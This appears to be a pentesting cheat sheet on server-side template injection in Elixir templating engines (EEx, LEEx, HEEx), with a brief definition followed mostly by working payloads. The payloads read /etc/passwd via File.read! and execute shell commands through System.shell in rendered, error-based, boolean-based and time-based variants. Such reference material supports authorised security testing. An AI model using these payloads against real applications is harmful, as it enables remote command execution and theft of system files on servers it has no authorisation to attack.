Server Side Template Injection - Elixir

Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.

Summary

• Templating Libraries
• Universal Payloads
• EEx
  • EEx - Basic injections
  • EEx - Retrieve /etc/passwd
  • EEx - Remote Command execution
• References

Templating Libraries

Template Name	Payload Format
EEx	<%= %>
LEEx	<%= %>
HEEx	<%= %>

Universal Payloads

Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.

By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx.

To use these payloads, wrap them in the appropriate tag.

elem(System.shell("id"), 0) # Rendered RCE
[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE
1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE
elem(System.shell("id && sleep 5"), 0) # Time-Based RCE

EEx

Official website

EEx stands for Embedded Elixir.

EEx - Basic injections

<%= 7 * 7 %>

EEx - Retrieve /etc/passwd

<%= File.read!("/etc/passwd") %>

EEx - Remote Command execution

<%= elem(System.shell("id"), 0) %> # Rendered RCE
<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE
<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE
<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE

References

• Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026

Share this content